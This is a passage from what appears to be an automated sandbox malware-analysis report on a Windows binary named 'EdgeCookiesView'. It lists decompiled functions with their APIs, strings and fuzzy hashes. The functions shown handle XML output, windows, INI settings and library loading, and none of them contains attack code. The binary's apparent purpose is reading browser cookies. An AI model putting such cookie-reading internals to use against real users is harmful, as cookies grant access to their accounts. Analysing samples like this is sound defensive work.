						E004086F5(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x38)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x48)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x6c)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x70)));
						L0040DFD6();
						_t46 = _t46 + 0x24;
						E00408857(__edi,  *((intOrPtr*)(__edi + 0x6c)), _a4,  *((intOrPtr*)(__edi + 0x70)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x34)));
				}
				return E00408857(_t40, _t38, _a4, L"</item>\r\n");
			}

0x00408e65
0x00408e65
0x00408e79
0x00408e7e
0x00408e83
0x00408e86
0x00408e86
0x00408e9c
0x00408eb3
0x00408eb5
0x00408eb8
0x00408ec7
0x00408ecd
0x00408ed2
0x00408ed4
0x00408ed5
0x00408ed8
0x00408ed9
0x00408ede
0x00408ee3
0x00408ee6
0x00408eeb
0x00408ef6
0x00408efb
0x00408efc
0x00408f01
0x00408f13

APIs

memset.MSVCRT ref: 00408E9C

Part of subcall function 0040DBDA: memcpy.MSVCRT ref: 0040DC57

Part of subcall function 004086F5: wcscpy.MSVCRT ref: 004086FA
Part of subcall function 004086F5: _wcslwr.MSVCRT ref: 0040872D

_snwprintf.MSVCRT ref: 00408EE6

Strings

<item>, xrefs: 00408E6F
</item>, xrefs: 00408F02
<%s>%s</%s>, xrefs: 00408ED9

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
String ID: <%s>%s</%s>$</item>$<item>
API String ID: 1775345501-2769808009
Opcode ID: cccc76d828ed89dcb2f0cf120a02d783cc869ebbd7d411c31fb40a59302af15a
Instruction ID: 8f4cdbf62ca08d82a34ba29bd692b6b076faad5caef0efcefbde8902b8c83394
Opcode Fuzzy Hash: cccc76d828ed89dcb2f0cf120a02d783cc869ebbd7d411c31fb40a59302af15a
Instruction Fuzzy Hash: BC11BF32A0021ABBDB11BF25CD86E997B25BF04308F00407AF945776A2C739B864DBD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA94, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040BA94(void* __esi) {
				struct _WNDCLASSW _v44;
				struct HINSTANCE__* _t20;
				struct HWND__* _t23;

				_v44.style = 0;
				_v44.lpfnWndProc = E00401896;
				_v44.cbClsExtra = 0;
				_v44.cbWndExtra = 0;
				_v44.hInstance = GetModuleHandleW(0);
				_v44.hIcon =  *((intOrPtr*)(__esi + 0x204));
				_v44.lpszClassName = __esi + 4;
				_v44.hCursor = 0;
				_v44.hbrBackground = 0x10;
				_v44.lpszMenuName = 0;
				RegisterClassW( &_v44);
				_t20 = GetModuleHandleW(0);
				_t23 = CreateWindowExW(0, L"EdgeCookiesView", L"EdgeCookiesView", 0xcf0000, 0x80000000, 0x80000000, 0x280, 0x1e0, 0, 0, _t20, __esi);
				 *(__esi + 0x208) = _t23;
				return _t23;
			}

0x0040baa5
0x0040baa8
0x0040baaf
0x0040bab2
0x0040bab7
0x0040bac0
0x0040bac6
0x0040bacd
0x0040bad0
0x0040bad7
0x0040bada
0x0040bae1
0x0040bb05
0x0040bb0c
0x0040bb14

APIs

GetModuleHandleW.KERNEL32(00000000,74784E00,00000000), ref: 0040BAB5
RegisterClassW.USER32 ref: 0040BADA
GetModuleHandleW.KERNEL32(00000000), ref: 0040BAE1
CreateWindowExW.USER32 ref: 0040BB05

Strings

EdgeCookiesView, xrefs: 0040BAFD, 0040BB02, 0040BB03

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModule$ClassCreateRegisterWindow
String ID: EdgeCookiesView
API String ID: 2678498856-2656830938
Opcode ID: d52d2fbc62bc1a1d04585868950ee5189a48b6182fc5a22ab83782a1eaa0276c
Instruction ID: 27e191b6334208d49ef5ca2aa5ba4bd18f44ae4e1b08ed08d13d2dfcc62d9bb3
Opcode Fuzzy Hash: d52d2fbc62bc1a1d04585868950ee5189a48b6182fc5a22ab83782a1eaa0276c
Instruction Fuzzy Hash: 3A01C8B1900208AFD711DF9A8D85AFFFBFCEB88710F10402AE915F2251D7B459458BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00406DE5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00406DE5(void* __eflags, WCHAR* _a4, WCHAR* _a8, intOrPtr _a12) {
				void _v8198;
				short _v8200;
				void* _t18;

				E0040E340(0x2004, _t18);
				_v8200 = _v8200 & 0x00000000;
				memset( &_v8198, 0, 0x2000);
				GetPrivateProfileStringW(0x412e48, _a4, 0x40f454,  &_v8200, 0x1000, 0x412c38);
				if(_v8200 == 0 || _a12 != 0) {
					return WritePrivateProfileStringW(0x412e48, _a4, _a8, 0x412c38);
				} else {
					return 0;
				}
			}

0x00406ded
0x00406df2
0x00406e0a
0x00406e32
0x00406e40
0x00000000
0x00406e48
0x00000000
0x00406e48

APIs

memset.MSVCRT ref: 00406E0A
GetPrivateProfileStringW.KERNEL32 ref: 00406E32
WritePrivateProfileStringW.KERNEL32(00412E48,?,?,00412C38), ref: 00406E54

Strings

H.A, xrefs: 00406E2C
8,A, xrefs: 00406E12

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$Writememset
String ID: 8,A$H.A
API String ID: 747731527-1209539780
Opcode ID: 77254ae23b063488fbe1f1531f71c30f435901724466fd7cc02357835f3fcc14
Instruction ID: e7880ec6ba8d46fe6e1110b4845dc0794c3ddc75899781143fe08dcc0165ab72
Opcode Fuzzy Hash: 77254ae23b063488fbe1f1531f71c30f435901724466fd7cc02357835f3fcc14
Instruction Fuzzy Hash: 91F0C836501318BAEB205B11CD4DFCB3779DB54714F004471BB05B61C2D3B89A94C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 004053B1, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
windowCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E004053B1(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040E340(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E004052B3(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040DFD6();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}

0x004053b1
0x004053b9
0x004053bf
0x004053c3
0x004053cb
0x004053cb
0x004053d4
0x004053df
0x004053e0
0x004053e1
0x004053ec
0x004053f1
0x004053f2
0x00405413

APIs

GetLastError.KERNEL32(00000000,?,004097E7,00000000,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74784E00,?), ref: 004053C5
_snwprintf.MSVCRT ref: 004053F2
MessageBoxW.USER32(?,?,Error,00000030), ref: 0040540B

Strings

Error %d: %s, xrefs: 004053E1
Error, xrefs: 004053FC

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastMessage_snwprintf
String ID: Error$Error %d: %s
API String ID: 313946961-1552265934
Opcode ID: c128aad518d94d0d1b5362608b5f3687addf0f3260f5ed8ca175d7d1039385b6
Instruction ID: d03f13e4b5835148045d3301d553e71923c4c821524e10c745d4efb14aa9052b
Opcode Fuzzy Hash: c128aad518d94d0d1b5362608b5f3687addf0f3260f5ed8ca175d7d1039385b6
Instruction Fuzzy Hash: 7BF0277A54020866CB21A795CC01FDA73FCFB44780F0404BBBA05F3181EAB4EA488E59

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB6F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040DB6F(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;

				_t7 = 0;
				_t8 = LoadLibraryW(L"shlwapi.dll");
				_t3 = GetProcAddress(_t8, "SHAutoComplete");
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}

0x0040db76
0x0040db7e
0x0040db86
0x0040db8e
0x0040db9b
0x0040db9b
0x0040db9e
0x0040dba8

APIs

LoadLibraryW.KERNEL32(shlwapi.dll,770B48C0,?,00402FB4,00000000), ref: 0040DB78
GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040DB86
FreeLibrary.KERNEL32(00000000,?,00402FB4,00000000), ref: 0040DB9E

Strings

shlwapi.dll, xrefs: 0040DB71
SHAutoComplete, xrefs: 0040DB80

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadProc
String ID: SHAutoComplete$shlwapi.dll
API String ID: 145871493-1506664499
Opcode ID: 87ae4be269f480ad3fc6ef5346fb091e914a06ba760325769d2b4f1956a8feb4
Instruction ID: 4ee66759be8abf9dca1a37f43ee2ec86a07497b6dee4ca36e5f36349581f2197
Opcode Fuzzy Hash: 87ae4be269f480ad3fc6ef5346fb091e914a06ba760325769d2b4f1956a8feb4
Instruction Fuzzy Hash: 3ED05B353111506BF7215736AD08EEF3AA5DFC57517050033F904E3152DB744D8A86BD

Uniqueness

Uniqueness Score: -1.00%

Function 00406B34, Relevance: 7.6, APIs: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406B34(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t31;
				struct HWND__* _t33;

				_t31 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t33 = GetParent(_t31);
					GetWindowRect(_t31,  &_v20);
					GetClientRect(_t33,  &_v36);
					MapWindowPoints(0, _t33,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t31, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00405D0F(_t31, 0x400000);
				}
				return 1;
			}

0x00406b3f
0x00406b42
0x00406b4c
0x00406b53
0x00406b5e
0x00406b6e
0x00406b7c
0x00406b84
0x00406b8a
0x00406b90
0x00406b95
0x00406b9d
0x00406ba3
0x00406ba9

APIs

GetParent.USER32(?), ref: 00406B46
GetWindowRect.USER32 ref: 00406B53
GetClientRect.USER32 ref: 00406B5E
MapWindowPoints.USER32 ref: 00406B6E
SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00406B8A

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientParentPoints
String ID:
API String ID: 4247780290-0
Opcode ID: aadb3aabc8d190ce9a7aff4ddfd3f7f2d7078e10d6ba6da20b60776d39ee92c3
Instruction ID: 8e7a0edbc95fdcc56b15363f287b575cc5c7f3f2b2b94fa66e9be29a0ee7bcd8
Opcode Fuzzy Hash: aadb3aabc8d190ce9a7aff4ddfd3f7f2d7078e10d6ba6da20b60776d39ee92c3
Instruction Fuzzy Hash: 48015732400129ABDB219BA59C49EFFBFBCEF06714F04413AF901F2080D778A5058BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00409F23, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00409F23(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040E038();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040E032();
				return _t20;
			}

0x00409f23
0x00409f29
0x00409f30
0x00409f31
0x00409f32
0x00409f3a
0x00409f3d
0x00409f3f
0x00409f48
0x00409f4b
0x00409f4e
0x00409f50
0x00409f53
0x00409f5a
0x00409f64
0x00409f6e
0x00409f73
0x00409f76
0x00409f79
0x00409f7c
0x00409f7f
0x00409f80
0x00409f85
0x00409f86
0x00409f89
0x00409f91

APIs

??2@YAPAXI@Z.MSVCRT ref: 00409F32
memcpy.MSVCRT ref: 00409F5A
memcpy.MSVCRT ref: 00409F64
memcpy.MSVCRT ref: 00409F6E
??3@YAXPAX@Z.MSVCRT ref: 00409F89

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$??2@??3@
String ID:
API String ID: 1252195045-0
Opcode ID: b86c0dfcea20ed5943c2189175d4b50205f28c5c643965f5f8caf492287ebdb1
Instruction ID: 9c944120e002927f8eec2413523e8dcd2a94c32319e751658ec61dd6637171fa
Opcode Fuzzy Hash: b86c0dfcea20ed5943c2189175d4b50205f28c5c643965f5f8caf492287ebdb1
Instruction Fuzzy Hash: C0012172C00118BBDF106FAAD8819DEBFB9EF44394F10807AF808B6152D6755E559B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040768E, Relevance: 7.5, APIs: 5, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040768E(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x38));
				if(_t9 != 0) {
					_push(_t9);
					L0040E032();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x48));
				if(_t10 != 0) {
					_push(_t10);
					L0040E032();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2e4));
				if(_t11 != 0) {
					_push(_t11);
					L0040E032();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2cc));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040E032();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040E032();
				}
				 *((intOrPtr*)(_t19 + 0x2cc)) = 0;
				 *((intOrPtr*)(_t19 + 0x38)) = 0;
				 *((intOrPtr*)(_t19 + 0x48)) = 0;
				 *((intOrPtr*)(_t19 + 0x2e4)) = 0;
				return _t11;
			}

0x0040768e
0x0040768e
0x00407697
0x00407699
0x0040769a
0x0040769f
0x004076a0
0x004076a5
0x004076a7
0x004076a8
0x004076ad
0x004076ae
0x004076b6
0x004076b8
0x004076b9
0x004076be
0x004076bf
0x004076c7
0x004076c9
0x004076cd
0x004076cf
0x004076d0
0x004076d6
0x004076d6
0x004076d8
0x004076d9
0x004076de
0x004076e0
0x004076e6
0x004076e9
0x004076ec
0x004076f3

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040769A
??3@YAXPAX@Z.MSVCRT ref: 004076A8
??3@YAXPAX@Z.MSVCRT ref: 004076B9
??3@YAXPAX@Z.MSVCRT ref: 004076D0
??3@YAXPAX@Z.MSVCRT ref: 004076D9

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 215cdfd6d564a20a082406ff577ac5ffa07c94b36e2e8180bf1e91046972ff33
Instruction ID: 342c1f177218003cdd1623b0f4e7fc54ae999312f226978e8e9af0a1ecb46938
Opcode Fuzzy Hash: 215cdfd6d564a20a082406ff577ac5ffa07c94b36e2e8180bf1e91046972ff33
Instruction Fuzzy Hash: F1F03C72949A515BC724AE6ED8C485BB3E9AB043647604C3FF14AE3690CA39BC904A1C

Uniqueness

Uniqueness Score: -1.00%

Function 00403054, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403054(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				void* __ebx;
				void* __esi;
				intOrPtr _t15;
				struct HDWP__* _t31;
				intOrPtr _t34;
				RECT* _t36;

				_push(__ecx);
				_t34 = __ecx;
				_v8 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t15 = _a12;
							 *((intOrPtr*)(_t15 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t15 + 0x1c)) = 0x78;
						}
					} else {
						E00401810(__ecx + 0x40);
					}
				} else {
					_t31 = BeginDeferWindowPos(3);
					_t36 = _t34 + 0x40;
					E004017E9(_t36, _t31, 0x3f1, 0, 0, 1);
					E004017E9(_t36, _t31, 1, 1, 1, 0);
					E004017E9(_t36, _t31, 2, 1, 1, 0);
					EndDeferWindowPos(_t31);
					InvalidateRect( *(_t36 + 0x10), _t36, 1);
					_t34 = _v8;
				}
				return E004015CE(_t34, _a4, _a8, _a12);
			}

0x00403057
0x0040305e
0x00403060
0x00403063
0x004030b9
0x004030c9
0x004030cb
0x004030ce
0x004030d5
0x004030d5
0x004030bb
0x004030be
0x004030be
0x00403065
0x00403076
0x0040307d
0x00403081
0x0040308c
0x00403098
0x0040309e
0x004030a9
0x004030af
0x004030b2
0x004030ef

APIs

BeginDeferWindowPos.USER32 ref: 00403068

Part of subcall function 004017E9: GetDlgItem.USER32 ref: 004017F2

EndDeferWindowPos.USER32(00000000), ref: 0040309E
InvalidateRect.USER32(?,?,00000001), ref: 004030A9

Strings

$, xrefs: 004030C5

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: DeferWindow$BeginInvalidateItemRect
String ID: $
API String ID: 4234876885-3993045852
Opcode ID: 9f95f7265a4407c1351ad9ebcb6b82dd225c6b4ae57057ea946bec00b32e7224
Instruction ID: 5bd367454bd051cdd9e75425df65f1b17fedc8d2c9609545a756db00ac89be97
Opcode Fuzzy Hash: 9f95f7265a4407c1351ad9ebcb6b82dd225c6b4ae57057ea946bec00b32e7224
Instruction Fuzzy Hash: 65119171140208FFEB215F51CCC5F6F3AACEB05799F10403AF5053A1D0D675AE459BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00409457, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00409457(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E004086F5(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040DFD6();
				return E00408857(_t26, _t26, _a4,  &_v1028);
			}

0x00409460
0x00409479
0x0040947b
0x00409480
0x00409492
0x0040949e
0x004094a2
0x004094a8
0x004094af
0x004094b0
0x004094bb
0x004094c0
0x004094c1
0x004094dd

APIs

memset.MSVCRT ref: 0040947B
memset.MSVCRT ref: 00409492

Part of subcall function 004086F5: wcscpy.MSVCRT ref: 004086FA
Part of subcall function 004086F5: _wcslwr.MSVCRT ref: 0040872D

_snwprintf.MSVCRT ref: 004094C1

Strings

</%s>, xrefs: 004094B0

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf_wcslwrwcscpy
String ID: </%s>
API String ID: 3400436232-259020660
Opcode ID: 8ddce1f62360dacabf53b406146bfe6f6197350877303745630cb16e54be09f3
Instruction ID: 85b546f447cb05eec590fc4b387cecce4986b1e61cf39ba9e2c32341b3a77f5f
Opcode Fuzzy Hash: 8ddce1f62360dacabf53b406146bfe6f6197350877303745630cb16e54be09f3
Instruction Fuzzy Hash: AE0186B3E0012966D720BB55CC45FEA767CEF45318F0004BABB09F71C2DB789E558A98

Uniqueness

Uniqueness Score: -1.00%

Function 00406C43, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00406C43(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040E340(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x412ec8; // 0x0
				}
				_t25 =  *0x412c38;
				if( *0x412c38 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00406CC6(_t12);
					if(E00406D72(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00406BAC, 0);
				}
				return _t9;
			}

0x00406c43
0x00406c4b
0x00406c51
0x00406c55
0x00406c57
0x00406c57
0x00406c5d
0x00406c65
0x00406c67
0x00406c7d
0x00406c82
0x00406c85
0x00406c86
0x00406ca1
0x00406cad
0x00406cad
0x00000000
0x00406cbd
0x00406cc5

APIs

memset.MSVCRT ref: 00406C7D
SetWindowTextW.USER32(?,?), ref: 00406CAD
EnumChildWindows.USER32 ref: 00406CBD

Strings

caption, xrefs: 00406C92

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ChildEnumTextWindowWindowsmemset
String ID: caption
API String ID: 1523050162-4135340389
Opcode ID: d0d1c183662057111760d53cf79a0ccaff861f51f495aa9ed578fc316b6293da
Instruction ID: 29de1f336f9b1ad8a88558a0c2ea7e463315901b0f4d8a0f0fc28385d02cb639
Opcode Fuzzy Hash: d0d1c183662057111760d53cf79a0ccaff861f51f495aa9ed578fc316b6293da
Instruction Fuzzy Hash: 2DF0A472900314AAFB30AB55DD4AF8A3768DB04714F1100B6FA05B71D2D7B8ADA4CA9C

Uniqueness

Uniqueness Score: -1.00%

Function 00405954, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405954(struct HWND__* _a4) {
				void _v514;
				short _v516;
				signed int _t11;

				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fe);
				GetClassNameW(_a4,  &_v516, 0xff);
				_t11 =  &_v516;
				_push(L"edit");
				_push(_t11);
				L0040E03E();
				asm("sbb eax, eax");
				return  ~_t11 + 1;
			}

0x0040595d
0x00405973
0x0040598a
0x00405990
0x00405996
0x0040599b
0x0040599c
0x004059a4
0x004059a9

APIs

memset.MSVCRT ref: 00405973
GetClassNameW.USER32 ref: 0040598A
_wcsicmp.MSVCRT ref: 0040599C

Strings

edit, xrefs: 00405996

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassName_wcsicmpmemset
String ID: edit
API String ID: 2747424523-2167791130
Opcode ID: d96ffc2340dd17deb26b5e0e58a9f5fe458e458e5f66db96c8edd361173f025a
Instruction ID: 748b3c7a54d916a83871e5d55f64a5683e5b8dafeb1aa9d8bd9837731e8c37d4
Opcode Fuzzy Hash: d96ffc2340dd17deb26b5e0e58a9f5fe458e458e5f66db96c8edd361173f025a
Instruction Fuzzy Hash: D7E0927298031E6AEB20EBB0DC4AFA577ACAB04708F4006B5B914F10C2EAB4964A4A44

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA9D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DA9D() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x413268 == 0) {
					_t1 = LoadLibraryW(L"shell32.dll");
					 *0x413268 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x413264 = _t2;
						return _t2;
					}
				}
				return _t1;
			}

0x0040daa4
0x0040daab
0x0040dab3
0x0040dab8
0x0040dac0
0x0040dac6
0x00000000
0x0040dac6
0x0040dab8
0x0040dacb

APIs

LoadLibraryW.KERNEL32(shell32.dll,0040BEBF,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040DAAB
GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040DAC0

Strings

shell32.dll, xrefs: 0040DAA6
SHGetSpecialFolderPathW, xrefs: 0040DABA

Memory Dump Source

